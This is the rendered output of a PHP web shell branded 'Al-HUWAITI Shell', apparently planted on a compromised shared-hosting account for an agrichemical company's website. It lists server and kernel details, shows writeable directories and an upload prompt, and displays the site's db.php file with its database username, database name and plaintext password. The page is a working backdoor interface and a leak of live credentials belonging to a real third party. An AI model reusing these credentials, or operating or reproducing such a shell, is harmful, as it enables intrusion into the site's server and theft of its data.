Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1002.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64
User : u811747229 ( 811747229)
PHP Version : 8.0.30
Disable Function : NONE
Directory :  /home/u811747229/domains/lakshiagrichem.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u811747229/domains/lakshiagrichem.com/public_html/db.php
<?php
$db_server="localhost";
$db_name= "u811747229_lakshi1";
$db_password="Lakshi@123";
$db_user="u811747229_Lakshi1";
$conn="";


try{
    $conn=mysqli_connect($db_server,
    $db_user,
    $db_password,
    $db_name);
}catch(mysqli_sql_exception){
    echo "DC";
}
if($conn){
    // echo "C";
}
?>

Al-HUWAITI Shell